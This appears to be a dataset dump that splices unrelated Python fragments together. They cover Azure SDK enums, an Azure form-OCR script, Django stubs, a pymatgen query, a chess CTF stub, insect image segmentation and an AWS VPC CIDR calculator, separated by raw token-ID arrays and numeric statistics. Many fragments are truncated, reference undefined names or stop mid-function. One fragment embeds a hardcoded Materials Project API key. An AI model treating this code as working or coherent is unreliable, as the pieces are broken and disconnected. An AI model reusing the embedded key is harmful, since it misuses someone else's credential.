"""Asynchronous operation status of the operation on the app service plan.
"""
#: Async operation has started.
STARTED = "Started"
#: Async operation has completed.
COMPLETED = "Completed"
#: Async operation failed to complete.
FAILED = "Failed"
class CommunicationCloudEnvironmentModel(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The cloud that the identifier belongs to.
"""
PUBLIC = "public"
DOD = "dod"
GCCH = "gcch"
class MediaJobErrorCategory(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Helps with categorization of errors.
"""
#: The error is service related.
SERVICE = "Service"
#: The error is download related.
DOWNLOAD = "Download"
#: The error is upload related.
UPLOAD = "Upload"
#: The error is configuration related.
CONFIGURATION = "Configuration"
#: The error is related to data in the input files.
CONTENT = "Content"
class MediaJobErrorCode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Error code describing the error.
"""
#: Fatal service error, please contact support.
SERVICE_ERROR = "ServiceError"
#: Transient error, please retry, if retry is unsuccessful, please contact support.
SERVICE_TRANSIENT_ERROR = "ServiceTransientError"
#: While trying to download the input files, the files were not accessible, please check the
#: availability of the source.
DOWNLOAD_NOT_ACCESSIBLE = "DownloadNotAccessible"
#: While trying to download the input files, there was an issue during transfer (storage service,
#: network errors), see details and check your source.
DOWNLOAD_TRANSIENT_ERROR = "DownloadTransientError"
#: While trying to upload the output files, the destination was not reachable, please check the
#: availability of the destination.
UPLOAD_NOT_ACCESSIBLE = "UploadNotAccessible"
#: While trying to upload the output files, there was an issue during transfer (storage service,
#: network errors), see details and check your destination.
UPLOAD_TRANSIENT_ERROR = "UploadTransientError"
#: There was a problem with the combination of input files and the configuration settings applied,
#: fix the configuration settings and retry with the same input, or change input to match the
#: configuration.
CONFIGURATION_UNSUPPORTED = "ConfigurationUnsupported"
#: There was a problem with the input content (for example: zero byte files, or corrupt/non-
#: decodable files), check the input files.
CONTENT_MALFORMED = "ContentMalformed"
#: There was a problem with the format of the input (not valid media file, or an unsupported
#: file/codec), check the validity of the input files.
CONTENT_UNSUPPORTED = "ContentUnsupported"
class MediaJobRetry(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Indicates that it may be possible to retry the Job. If retry is unsuccessful, please contact
Azure support via Azure Portal.
"""
#: Issue needs to be investigated and then the job resubmitted with corrections or retried once
#: the underlying issue has been corrected.
DO_NOT_RETRY = "DoNotRetry"
#: Issue may be resolved after waiting for a period of time and resubmitting the same Job.
MAY_RETRY = "MayRetry"
class MediaJobState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The previous state of the Job.
"""
#: The job was canceled. This is a final state for the job.
CANCELED = "Canceled"
#: The job is in the process of being canceled. This is a transient state for the job.
CANCELING = "Canceling"
#: The job has encountered an error. This is a final state for the job.
ERROR = "Error"
#: The job is finished. This is a final state for the job.
FINISHED = "Finished"
#: The job is processing. This is a transient state for the job.
PROCESSING = "Processing"
#: The job is in a queued state, waiting for resources to become available. This is a transient
#: state.
QUEUED = "Queued"
#: The job is being scheduled to run on an available resource. This is a transient state, between
#: queued and processing states.
SCHEDULED = "Scheduled"
class StampKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Kind of environment where app service plan is.
"""
#: App Service Plan is running on a public stamp.
PUBLIC = "Public"
#: App Service Plan is running on an App Service Environment V1.
ASE_V1 = "AseV1"
#: App Service Plan is running on an App Service Environment V2.
ASE_V2 = "AseV2"
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
16529,
35937,
198,
2,
15069,
357,
66,
8,
5413,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
49962,
739,
262,
17168,
13789,
13,
4091,
13789,
13,
14116,
287,
262,
1628,
6808,
329,
5964,
1321,
13,
19... | 3.204191 | 1,861 |
import numpy as np
import tensorflow as tf
from DeepAgent.interfaces.ibaseNetwork import BaseNetwork
| [
11748,
299,
32152,
355,
45941,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
198,
6738,
10766,
36772,
13,
3849,
32186,
13,
571,
589,
26245,
1330,
7308,
26245,
628
] | 3.678571 | 28 |
# Generated by Django 3.0.8 on 2020-07-28 16:09
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.fields
| [
2,
2980,
515,
416,
37770,
513,
13,
15,
13,
23,
319,
12131,
12,
2998,
12,
2078,
1467,
25,
2931,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
198,
11748,
42625,
14208,
13,
9945,
13,
27530,
13,
2934,
1616,
295,
... | 2.849057 | 53 |
from azure.ai.formrecognizer import FormRecognizerClient
from azure.core.credentials import AzureKeyCredential
import pandas as pd
from .ds import AzureOCR, OCRText
from .common import LineNumber
if __name__ == '__main__':
document_filepath = ''
endpoint =''
subscription_key = ''
form_api_ocr = AzureFormApiOCR(document_filepath=document_filepath, endpoint=endpoint, subscription_key=subscription_key)
line_dataframe= form_api_ocr.line_dataframe
word_dataframe = form_api_ocr.word_dataframe
ocr_outputs = form_api_ocr.ocr_outputs
is_scanned = form_api_ocr.is_scanned
form_api_ocr = AzureFormApiOCR(document_filepath=document_filepath,
endpoint=endpoint,
subscription_key=subscription_key,
ocr_outputs=ocr_outputs)
| [
6738,
35560,
495,
13,
1872,
13,
687,
26243,
7509,
1330,
5178,
6690,
2360,
7509,
11792,
198,
6738,
35560,
495,
13,
7295,
13,
66,
445,
14817,
1330,
22134,
9218,
34,
445,
1843,
198,
11748,
19798,
292,
355,
279,
67,
198,
198,
6738,
764,
... | 2.285714 | 378 |
from django.db import models as mo
from django.utils.translation import ugettext_lazy as _
from kalinka.core.models import *
#class Transcode(mo.Model):
# uuid = mo.CharField(_('UUID'), max_length=120, primary_key=True)
# application = mo.ForeignKey(Application, verbose_name=_('Application'), db_column='application')
# task = mo.ForeignKey(TranscodeTask, verbose_name=_('Task'), db_column='task')
#
# def __unicode__(self):
# return "%s with %s" % (self.application, self.task)
#
# class Meta:
# db_table = u'klk_app_transcode'
| [
6738,
42625,
14208,
13,
9945,
1330,
4981,
355,
6941,
201,
198,
6738,
42625,
14208,
13,
26791,
13,
41519,
1330,
334,
1136,
5239,
62,
75,
12582,
355,
4808,
201,
198,
201,
198,
6738,
479,
282,
48955,
13,
7295,
13,
27530,
1330,
1635,
201,... | 2.474576 | 236 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 3 19:10:25 2019
@author: NickT
"""
import pickle
from pymatgen import MPRester
mat_api_key = 'JWV6Fi4f6VfxROtHO2uP'
mpr = MPRester(mat_api_key)
print("Loading Compounds....")
Querey = mpr.query(criteria = {'elements': ['Si'], 'nelements': 1}, properties=["task_id", "pretty_formula", 'e_above_hull',
'elements', 'volume', 'formation_energy_per_atom', 'band_gap',
'nsites', 'unit_cell_formula'])
file = open('MPDatabase.pickle', 'wb')
pickle.dump(all_compounds, file)
file.close()
stable_phase = []
for compound in all_compounds: #find all compounds with e_above_hull within 0.05 of 0
if abs(compound['e_above_hull']) < criteria/1000:
stable_phase.append(compound)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
3300,
2758,
220,
513,
678,
25,
940,
25,
1495,
13130,
198,
198,
31,
9800,
25,
8047,
51,
... | 2.265363 | 358 |
import chess
import ai
cnt = 0
res_F = 'Wrong command\n'
res_0 = 'Plz continue\n'
res_1 = 'Normal end\nTry to check mate as early as possible!\n'
res_2 = 'You lose!\nShe cheated!\nHint: Check her step!\n'
flag = '*CTF{1F_i_had_A_t!me_mAch1ne}\n'
boards = []
| [
11748,
19780,
198,
11748,
257,
72,
198,
198,
66,
429,
796,
657,
198,
411,
62,
37,
796,
705,
39213,
506,
3141,
59,
77,
6,
198,
411,
62,
15,
796,
705,
3646,
89,
2555,
59,
77,
6,
198,
411,
62,
16,
796,
705,
26447,
886,
59,
77,
... | 2.20339 | 118 |
start_time = time.time()
## Local Contrast Normalization
def lcn_2d(im, sigmas=[1.591, 1.591]):
""" Apply local contrast normalization to a square image.
Uses a scheme described in Pinto et al (2008)
Based on matlab code by Koray Kavukcuoglu
http://cs.nyu.edu/~koray/publis/code/randomc101.tar.gz
data is 2-d
sigmas is a 2-d vector of standard devs (to define local smoothing kernel)
Example
=======
im_p = lcn_2d(im,[1.591, 1.591])
"""
#assert(issubclass(im.dtype.type, np.floating))
im = np.cast[np.float](im)
# 1. subtract the mean and divide by std dev
mn = np.mean(im)
sd = np.std(im, ddof=1)
im -= mn
im /= sd
lmn = gaussian_filter(im, sigmas, mode='reflect')
lmnsq = gaussian_filter(im ** 2, sigmas, mode='reflect')
lvar = lmnsq - lmn ** 2;
np.clip(lvar, 0, np.inf, lvar) # items < 0 set to 0
lstd = np.sqrt(lvar)
np.clip(lstd, 1, np.inf, lstd)
im -= lmn
im /= lstd
return im
# Training Set
cd '/export/mlrg/salavi/shamir/Annotation data set/Original Images/Good Images/Positive Counts/Training Set'
### Test Set
##cd '/mnt/ssd/shamir/Original Images/Good Images/Positive Counts/Test Set'
img_list = glob.glob('*.jpg') # creates a list of all the files with the given format
img_list = np.sort(np.array(img_list))
first_qrtr, second_qrtr = 112, 145
feature_database = []
for z in range(shape(img_list)[0]): # shape(img_list)[0], alternatively, len(...)
## cd '/export/mlrg/salavi/shamir/Annotation data set/Original Images/Good Images/Positive Counts/Training Set'
## print z, img_list[z]
### Get coordinates and extract BBgt
# decode JSON
json_data = open(img_list[z][:-4]) # img_list[z][:-4]
data = json.load(json_data)
brx, tlx, bry, tly = [], [], [], []
for x in range(shape(data["Image_data"]["boundingboxes"][:])[0]):
brx.append(data["Image_data"]["boundingboxes"][x]["corner_bottom_right_x"])
tlx.append(data["Image_data"]["boundingboxes"][x]["corner_top_left_x"])
bry.append(data["Image_data"]["boundingboxes"][x]["corner_bottom_right_y"])
tly.append(data["Image_data"]["boundingboxes"][x]["corner_top_left_y"])
brx = np.array(brx)
bry = np.array(bry)
tly = np.array(tly)
tlx = np.array(tlx)
x,y,x1,y1 = tlx, tly, brx, bry # m,n,m+w,n+h
# The Annotation Tool enables the user to draw bouning boxes beyond the image boundary which gives unexpected coordinates. To rectify this bug, the
# following function reduces the corresponding incorrect BB coordinates to a specific value (x = 639, y = 479) within the image boundaries.
rectify(x, 640)
rectify(x1, 640)
rectify(y, 480)
rectify(y1, 480)
## Extract BBgt
## cd '/export/mlrg/salavi/shamir/Annotation data set/Original Images/Good Images/Positive Counts/Training Set'
insects_red, insects_green, insects_blue = [], [], []
## im_org = Image.open(img_list[z]) # original image
im_org = cv2.imread(img_list[z], cv2.CV_LOAD_IMAGE_COLOR)
im_red_eq = lcn_2d(im_org[:,:,0],[10, 10])
im_green_eq = lcn_2d(im_org[:,:,1],[10, 10]) # 1.591
im_blue_eq = lcn_2d(im_org[:,:,2],[10, 10])
im_red = med_filter(im_red_eq)
im_green = med_filter(im_green_eq)
im_blue = med_filter(im_blue_eq)
cv2.normalize(im_red, im_red, 0,255,cv2.NORM_MINMAX)
cv2.normalize(im_green, im_green, 0,255,cv2.NORM_MINMAX)
cv2.normalize(im_blue, im_blue, 0,255,cv2.NORM_MINMAX)
## ## Linear normalization
## def normalize(image, newMax, newMin):
## img_min = np.min(image)
## img_max = np.max(image)
## for y in range(shape(image)[0]):
## for x in range(shape(image)[1]):
## image[y,x] = (((image[y,x] - img_min)*(newMax - newMin))/(img_max - img_min)) + newMin
## return image
##
## im_red = normalize(im_red, 255, 0)
## im_green = normalize(im_green, 255, 0)
## im_blue = normalize(im_blue, 255, 0)
save_insct(x, im_red, insects_red)
save_insct(x, im_green, insects_green)
save_insct(x, im_blue, insects_blue)
## for i in range(2,3): # len(x)
#### cropped = im_org.crop((int(x[i]),int(y[i]),int(x1[i]),int(y1[i]))) # PIL
## cropped = im_org[y[i]:y1[i], x[i]:x1[i]] # OpenCV
#### cropped = np.asarray(cropped) # weirdly auto-flipped
## insects.append(cropped)
## insects = np.array(insects)
for ins in range(len(insects_red)): # len(insects_red)
## print ins
im_red = insects_red[ins].copy() # PROBLEM: ALL THE IMAGES DO NOT CONFORM TO THIS CODE (POSSIBLE BUG - TRY ALL LCN IMAGES TO FIND OUT)
im_green = insects_green[ins].copy()
im_blue = insects_blue[ins].copy()
## Calculate the centre of each BB
x_im = shape(im_red)[1]
y_im = shape(im_red)[0]
x_centre = x_im/2.0
y_centre = y_im/2.0
## Calculate n by n neighbouring pixels from the centre (include centre) and store all the pixels in their respectice arrays
nbr_list_red, nbr_list_green, nbr_list_blue = [], [], []
get_centre(nbr_list_red, x_centre, y_centre, 1, 2, im_red) # optimum value (tunable)
get_centre(nbr_list_green, x_centre, y_centre, 1, 2, im_green)
get_centre(nbr_list_blue, x_centre, y_centre, 1, 2, im_blue)
## nbr_list_red = np.array(nbr_list_red)
## nbr_list_green = np.array(nbr_list_green)
## nbr_list_blue = np.array(nbr_list_blue)
############################################################################################################################################################
## Perform background extraction (US Patent)
red_avg = np.mean(nbr_list_red[:])
green_avg = np.mean(nbr_list_green[:])
blue_avg = np.mean(nbr_list_blue[:])
im_red_back = im_red.copy()
im_green_back = im_green.copy()
im_blue_back = im_blue.copy()
# tunable parameters
sub_backgnd(im_red_back, im_green_back, im_blue_back, 1.2) # *1.15 or 1.2 - best results with LCN
## im_back = dstack([im_red_back, im_green_back, im_blue_back])
############################################################################################################################################################
## Convert image (current and background) from RGB to YCbCr and create HSI model
# RGB to YCbCr
im_y, im_cb, im_cr = rgb2ycbcr(im_red, im_green, im_blue)
im_y_back, im_cb_back, im_cr_back = rgb2ycbcr(im_red_back, im_green_back, im_blue_back)
im_int, im_hue, im_sat = ycbcr2hsi(im_y, im_cb, im_cr)
im_int_back, im_hue_back, im_sat_back = ycbcr2hsi(im_y_back, im_cb_back, im_cr_back)
# Create image differences
im_int_diff = abs(im_int - im_int_back) # gives you an inverted image :(
im_hue_diff = abs(im_hue - im_hue_back)
im_sat_diff = abs(im_sat - im_sat_back)
## Histogram plotting (no need to consider neighbouring pixels)
pixels_int, pixels_hue, pixels_sat = [], [], []
# omit the corresponding width and centre variables from below if these are commented out above
hist_int, bins_int, width_int, centre_int = create_hist(pixels_int, im_int_diff)
hist_hue, bins_hue, width_hue, centre_hue = create_hist(pixels_hue, im_hue_diff)
hist_sat, bins_sat, width_sat, centre_sat = create_hist(pixels_sat, im_sat_diff)
## ADAPTIVE THRESHOLDING (see patent for algorithm)
# Set threshold to the default value bin
N1, search_thresh_int = adaptive_thresh(hist_int, bins_int)
N2, search_thresh_hue = adaptive_thresh(hist_hue, bins_hue)
N3, search_thresh_sat = adaptive_thresh(hist_sat, bins_sat)
## The last words (binary thresholding, morphological operations and connected-components labelling)
inty, hue, sat = im_int_diff.copy(), im_hue_diff.copy(), im_sat_diff.copy()
inty[:,:][inty[:,:] <= search_thresh_int] = False #True
inty[:,:][inty[:,:] > search_thresh_int] = True #False
hue[:,:][hue[:,:] <= search_thresh_hue] = False #True
hue[:,:][hue[:,:] > search_thresh_hue] = True #False
sat[:,:][sat[:,:] <= search_thresh_sat] = False #True
sat[:,:][sat[:,:] > search_thresh_sat] = True #False
im_combinedOR = np.logical_or(inty, hue, sat)
open_img = ndimage.binary_opening(im_combinedOR, structure = np.ones((2,2)).astype(np.int)) # works best
close_img = ndimage.binary_closing(open_img) # open_img
mask = close_img > close_img.mean()
label_im, nb_labels = ndimage.label(mask)
sizes = ndimage.sum(mask, label_im, range(nb_labels + 1))
mask_size = sizes < 10
remove_pixel = mask_size[label_im]
label_im[remove_pixel] = False
im_label = np.array(label_im > 0, dtype = uint8) # plotting is weird, probably due to dtype conversion
cnt, hierarchy = cv2.findContours(im_label,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
if shape(cnt)[0] > 1:
print 'too many contours in ', img_list[z], 'id# ', ins
continue
elif shape(cnt)[1] < 5:
print 'rectangular contour; possible reason: region too noisy; image# ', img_list[z], 'id# ', ins
continue
else:
#### FEATURE EXTRACTION ####
### Colour-based features
## im_gray = cv2.cvtColor(im_org, cv2.COLOR_BGR2GRAY)
for h, cntr in enumerate(cnt):
mask = np.zeros(im_int.shape, np.uint8)
cv2.drawContours(mask,[cntr],0,255,-1)
mean = cv2.mean(im_int, mask = mask)
find = np.where(mask > 0)
x_axis = find[1][:]
y_axis = find[0][:]
## Average intensity
intensity = []
avg_intensity = avg_int(intensity, im_int, x_axis, y_axis)
## Intensity histogram
pixels = []
hist, bins, width, centre = create_hist(pixels, im_int, x_axis, y_axis)
## plt.bar(centre, hist, align = 'center', width = width)
## ax = plt.gca()
## ax.set_xlim((0,255))
## plt.show()
### Conotur-based features
area = cv2.contourArea(cnt[0]) # Area
perimeter = cv2.arcLength(cnt[0], True) # Perimeter
ellipse = cv2.fitEllipse(cnt[0])
(centre, axes, orientation) = ellipse
length = max(axes) # Length
width = min(axes) # Width
circular_fitness = (4*pi*area)/np.square(perimeter) # Circular fitness
elongation = length/width # Elongation
## print 'area = ' , area
## print 'perimeter = ' , perimeter
## print 'length = ' , length
## print 'width = ' , width
## print 'circular_fitness = ' , circular_fitness
## print 'elongation = ' , elongation
## print 'average intensity = ' , avg_intensity
## print 'intensity histogram = ' , hist
feature_dict = {'area': area, 'perimeter': perimeter, 'length': length, 'width': width, 'circular_fitness': circular_fitness, 'elongation': elongation, 'average intensity': avg_intensity, 'intensity histogram': hist}
feature_database.append(feature_dict)
feature_database_TrainingSet = np.array(feature_database)
print time.time() - start_time, "seconds --> Execution time"
| [
9688,
62,
2435,
796,
640,
13,
2435,
3419,
198,
198,
2235,
10714,
47011,
14435,
1634,
198,
198,
4299,
300,
31522,
62,
17,
67,
7,
320,
11,
43237,
5356,
41888,
16,
13,
48952,
11,
352,
13,
48952,
60,
2599,
198,
220,
220,
220,
37227,
2... | 2.110898 | 5,744 |
import argparse
import ipaddress
from sys import stderr
import boto3
from pkg_resources import get_distribution, DistributionNotFound
try:
from pyvpc_cidr_block import PyVPCBlock, return_pyvpc_objects_string, return_pyvpc_objects_json
except ModuleNotFoundError:
from .pyvpc_cidr_block import PyVPCBlock, return_pyvpc_objects_string, return_pyvpc_objects_json
def get_aws_regions_list():
"""
Get a list of AWS regions, uses:
https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.describe_regions
Return a list of strings with all available regions
:return: list
"""
regions = boto3.client('ec2').describe_regions()['Regions']
regions_list = []
for region in regions:
regions_list.append(region['RegionName'])
return regions_list
def get_aws_vpc_if_exists(vpc_id_name, aws_region=None):
"""
Return reserved subnets, in input vpc
if first response successful, using vpc-id filter return the vpc-id found,
if vpc not found by its id, make second call using name filter,
return error if more then one vpc has same name
:param vpc_id_name: string
:param aws_region: string
:return: PyVPCBlock object
"""
response = boto3.client('ec2', region_name=aws_region).describe_vpcs(
Filters=[
{
'Name': 'vpc-id',
'Values': [
vpc_id_name,
]
},
],
)['Vpcs']
if response:
vpc_cidr = ipaddress.ip_network(response[0]['CidrBlock'])
vpc_id = response[0]['VpcId']
vpc_name = get_aws_resource_name(response[0])
return PyVPCBlock(network=vpc_cidr, resource_id=vpc_id, name=vpc_name, resource_type='vpc')
# In case no VPC found using vpc-id filter, try using input as name filter
response = boto3.client('ec2', region_name=aws_region).describe_vpcs(
Filters=[
{
'Name': 'tag:Name',
'Values': [
vpc_id_name,
]
},
],
)['Vpcs']
# There is a single vpc with 'vpc_id_name'
if len(response) == 1:
vpc_cidr = ipaddress.ip_network(response[0]['CidrBlock'])
vpc_id = response[0]['VpcId']
vpc_name = get_aws_resource_name(response[0])
return PyVPCBlock(network=vpc_cidr, resource_id=vpc_id, name=vpc_name, resource_type='vpc')
# Is case there are multiple VPCs with the same name, raise exception
elif len(response) > 1:
found = []
for x in response:
found.append(x['VpcId'])
raise ValueError("more then one vpc found with name {} - {}".format(vpc_id_name, str(found)))
# Nothing found
return None
def get_aws_reserved_subnets(vpc_id, aws_region=None):
"""
Get a list of AWS subnets of a given VPC
:param vpc_id: string
:param aws_region: string
:return: list of PyVPCBlock objects
"""
response = boto3.client('ec2', region_name=aws_region).describe_subnets(
Filters=[
{
'Name': 'vpc-id',
'Values': [
vpc_id,
]
}
])['Subnets']
reserved_subnets = []
for subnet in response:
reserved_subnets.append(PyVPCBlock(network=ipaddress.ip_network(subnet['CidrBlock']),
resource_id=subnet['SubnetId'],
name=get_aws_resource_name(subnet),
resource_type='subnet'))
return reserved_subnets
def get_aws_reserved_networks(region=None, all_regions=False):
"""
Get a list of AWS cidr networks that are already used in input region,
or get all vpc(s) from all available regions if all_regions is True, uses:
https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.describe_vpcs
:param region: string
:param all_regions: boolean
:return: list of PyVPCBlock objects
"""
result = []
if all_regions:
for aws_region in get_aws_regions_list():
for vpc in boto3.client('ec2', region_name=aws_region).describe_vpcs()['Vpcs']:
result.append(vpc)
else:
result = boto3.client('ec2', region_name=region).describe_vpcs()['Vpcs']
vpc_used_cidr_list = []
for vpc in result:
vpc_used_cidr_list.append(PyVPCBlock(network=ipaddress.ip_network(vpc['CidrBlock']),
resource_id=vpc['VpcId'],
name=get_aws_resource_name(vpc),
resource_type='vpc'))
return vpc_used_cidr_list
def calculate_overlap_ranges(network, reserved_network):
"""
Function will calculate all available ranges of over lapping network, all possible scenarios demonstrates below.
There are exactly 4 possible scenarios:
10.10.0.0
10.8.0.0/14 | 10.11.255.255
| | |
network -> *--------------------------------------*
|################|
reserved -> |------------|----------------|
network | ^ |
10.5.0.0 | 10.9.255.255
10.7.255.255
10.10.0.0/16 10.10.255.255
| |
network -> *---------------|-----------------------------|---------------|
|#############################|
reserved -> |-----------------------------|
network | |
10.10.50.0/24 10.10.50.255
10.10.50.0/24 10.10.255.255
| |
network -> *-----------|-----------|
|###########|
reserved -> |-----------|-----------------------|
network | |
10.10.0.0/16 10.10.50.255
:param network:
:param reserved_network:
:return:
"""
if network.overlaps(reserved_network):
ranges = []
# If the lower boundary of current head is smaller than the lower boundary of reserved_network
# It means the 'reserved_network' network is necessarily from 'the right' of head, and its available
if network[0] < reserved_network[0]:
ranges.append({'lower_ip': network[0], 'upper_ip': reserved_network[0] - 1, 'available': True})
# Append the overlapping network as NOT available
ranges.append({'lower_ip': reserved_network[0], 'upper_ip': reserved_network[-1], 'available': False})
if reserved_network[-1] < network[-1]:
ranges.append({'lower_ip': reserved_network[-1] + 1, 'upper_ip': network[-1], 'available': True})
return ranges
else:
return [{'lower_ip': network[0], 'upper_ip': network[-1], 'available': True}]
def get_available_networks(desired_cidr, reserved_networks):
"""
This function can be complex to understand without debugging,
an example with
'desired_cidr=10.0.0.0/8' and
'reserved_networks=[IPv4Network('10.8.0.0/1'), IPv4Network('10.10.0.0/16'), IPv4Network('10.50.0.0/16')]'
will be shown as comments
(head) 10.10.0.0/16 (tail)
10.0.0.0/8 | 10.10.255.255/16 10.255.255.255
| | | |
(1) desired_cidr (10.0.0.0/8) -> *----|--------|------------|---------|--------|------------|-------------|
|#######^|############|^########| |############|
(2) reserved_net (10.10.0.0/16) -> |#######||------------||########| |############|
|#######|##############|########| |############|
(3) reserved_net (10.50.0.0/16) -> |#######|##############|########| |------------|
|#######|##############|########| | |
(4) reserved_net (10.10.0.0/14) -> |-------|--------------|--------| | |
10.8.0.0/14 | | 10.11.255.255 | |
| | | |
10.9.255.255/16 10.11.0.0/16 | |
10.50.0.0/16 10.50.255.255
So in this example there should be 3 available ranges, and 3 reserved ranges (marked with #)
Printed output should be:
| Lowest IP | Upper IP | Num of Addr | Available | ID | Name |
|-------------|----------------|---------------|-------------|-----------------------|---------------|
| 10.0.0.0 | 10.7.255.255 | 524288 | True | | |
| 10.8.0.0 | 10.11.255.255 | 262144 | False | vpc-vxx3X5hzPNk9Jws9G | alpha |
| 10.10.0.0 | 10.10.255.255 | 65536 | False | vpc-npGac6CHRJE2JakNZ | dev-k8s |
| 10.12.0.0 | 10.49.255.255 | 2490368 | True | | |
| 10.50.0.0 | 10.50.255.255 | 65536 | False | vpc-f8Sbkd2jSLQF6x9Qd | arie-test-vpc |
| 10.51.0.0 | 10.255.255.255 | 13434880 | True | | |
:param desired_cidr: IPv4Network
:param reserved_networks: list of PyVPCBlock objects
:return: list of PyVPCBlock objects
"""
# If there are no reserved networks, then return that all 'desired_cidr' (Network Object) range is available
if not reserved_networks:
# Since there are no reserved network, the lower, and upper boundary of the 'desired_cidr' can be used
return [PyVPCBlock(network=desired_cidr, block_available=True)]
# in order to find/calculate available networks, reduce list of networks to only overlapping networks
overlapping_networks = []
for reserved_net in reserved_networks:
if desired_cidr.overlaps(reserved_net.get_network()):
# need to figure out how the reserved network is 'blocking' the desired cidr
overlapping_networks.append(reserved_net)
# If overlapping_networks is empty, then there where reserved networks, but did not overlapped
if not overlapping_networks:
return [PyVPCBlock(network=desired_cidr, block_available=True)]
# Sort PyVPCBlock objects (overlapping networks) by the 'network' field, so it will be easier to calculate
overlapping_networks = sorted(overlapping_networks, key=lambda x: x.network, reverse=False)
networks_result = []
range_head = desired_cidr[0] # Mark the start of calculation at the HEAD (view details above) point
range_tail = desired_cidr[-1] # Mark the end of calculation at the TAIL (view details above) point
# Iterate over the overlapping networks
for reserved_net in overlapping_networks:
# If the lower boundary of current range_head is smaller than the lower boundary of reserved_net
# It means the 'reserved_net' network is necessarily from 'the right' of range_head, and its available
if range_head < reserved_net.get_start_address():
networks_result.append(PyVPCBlock(start_address=range_head,
end_address=reserved_net.get_start_address() - 1,
block_available=True,
resource_type='available block'))
# Append the overlapping network as NOT available
networks_result.append(PyVPCBlock(network=reserved_net.get_network(), resource_id=reserved_net.get_id(),
name=reserved_net.get_name()))
# If the most upper address of current reserved_net (that is overlapping the desired_cidr),
# is larger/equal than the most upper address of desired_cidr, then there is no point perform calculations
if reserved_net.get_end_address() >= range_tail:
break
else: # Else there might be other overlapping networks,
# head should always point to the next lower available address
# so only if current head is "from the left" of most upper overlapping network, set it as new head,
# As there might be a case of an inner network, see reserved_net (2) for details
if range_head < reserved_net.get_end_address():
# Set the new range_head value, to one ip address above the upper boundary of reserved_net
range_head = reserved_net.get_end_address() + 1
# If last iteration (here are no more overlapping networks, until the 'range_tail' address)
if overlapping_networks.index(reserved_net) == len(overlapping_networks) - 1:
networks_result.append(PyVPCBlock(start_address=range_head,
end_address=range_tail,
block_available=True))
return networks_result
def calculate_suggested_cidr(ranges, prefix, minimal_num_of_addr):
"""
Get available CIDR (network object), among input ip ranges, according requirements
Example:
Input ranges are:
| Lowest IP | Upper IP | Num of Addr | Available | ID | Name |
|-------------|----------------|---------------|-------------|-----------------------|---------------|
| 10.0.0.0 | 10.7.255.255 | 524288 | True | | |
| 10.8.0.0 | 10.11.255.255 | 262144 | False | vpc-vxx3X5hzPNk9Jws9G | alpha |
| 10.10.0.0 | 10.10.255.255 | 65536 | False | vpc-npGac6CHRJE2JakNZ | dev-k8s |
| 10.12.0.0 | 10.49.255.255 | 2490368 | True | | |
| 10.50.0.0 | 10.50.255.255 | 65536 | False | vpc-f8Sbkd2jSLQF6x9Qd | arie-test-vpc |
| 10.51.0.0 | 10.255.255.255 | 13434880 | True | | |
function will iterate over all these ranges (lower - upper ip),
and inspect only those that have the Available: True value,
if minimal_num_of_addr param passed, return the first network that has enough addresses
if prefix param passed, return first available network with input prefix
if non of the above passed, return the first available network found
:param ranges: list of PyVPCBlock objects
:param prefix: int
:param minimal_num_of_addr: int
:return: IPv4Network object
"""
possible_subnets = []
# For each PyVPCBlock object (available or not)
for net_range in ranges:
# Only if available block found, there is logic to continue
if net_range.block_available:
possible_networks = []
# The summarize_address_range function will return a list of IPv4Network objects,
# Docs at https://docs.python.org/3/library/ipaddress.html#ipaddress.summarize_address_range
net_cidr = ipaddress.summarize_address_range(net_range.get_start_address(), net_range.get_end_address())
try: # Convert start/end IPs to possible CIDRs,
for net in net_cidr:
possible_networks.append(net) # appending IPv4Network objects
except TypeError as exc:
raise TypeError('error converting {} and {} to cidr, '.format(net_range.get_start_address(),
net_range.get_end_address()) + str(exc))
except ValueError as exc:
raise TypeError('error converting {} and {} to cidr, '.format(net_range.get_start_address(),
net_range.get_end_address()) + str(exc))
for network in possible_networks:
# In case a minimal number of addresses requested
if minimal_num_of_addr:
if minimal_num_of_addr <= network.num_addresses:
possible_subnets.append(PyVPCBlock(network=network, block_available=True))
# Return first available network with input suffix
elif prefix:
try:
network_subnets = network.subnets(new_prefix=prefix)
for sub in network_subnets:
possible_subnets.append(PyVPCBlock(network=sub, block_available=True))
except ValueError as exc:
raise ValueError(str(exc) + ', lowest ip examined range is {}, but prefix was {}'
.format(network, prefix))
# No prefix or minimal num of addresses requested
else:
possible_subnets.append(PyVPCBlock(network=network, block_available=True))
# If empty, then no suitable range found (or all are overlapping, or there are not enough ip addresses requested)
# return list of PyVPCBlock objects
return possible_subnets
def check_valid_ip_int(value):
"""
Validate that value is an integer between 0 to 340,282,366,920,938,463,463,374,607,431,768,211,455
IPv4 0 to 4,294,967,295
IPv6 4,294,967,296 to 340,282,366,920,938,463,463,374,607,431,768,211,455
:param value: int
:return: int
"""
try:
address = int(value)
except ValueError:
raise argparse.ArgumentTypeError('value is not a positive number: {}'.format(value))
try:
ipaddress.ip_address(address)
except ValueError:
raise argparse.ArgumentTypeError('is out of IPv4/IPv6 boundaries')
return address
def check_valid_ip_prefix(value):
"""
Validate that value is an integer between 0 to 32
:param value: int
:return: int
"""
prefix = int(value)
if prefix < 0 or prefix > 32:
raise argparse.ArgumentTypeError('{} is an invalid IPv4 prefix'.format(prefix))
return prefix
def get_self_version(dist_name):
"""
Return version number of input distribution name,
If distribution not found return not found indication
:param dist_name: string
:return: version as string
"""
try:
return get_distribution(dist_name).version
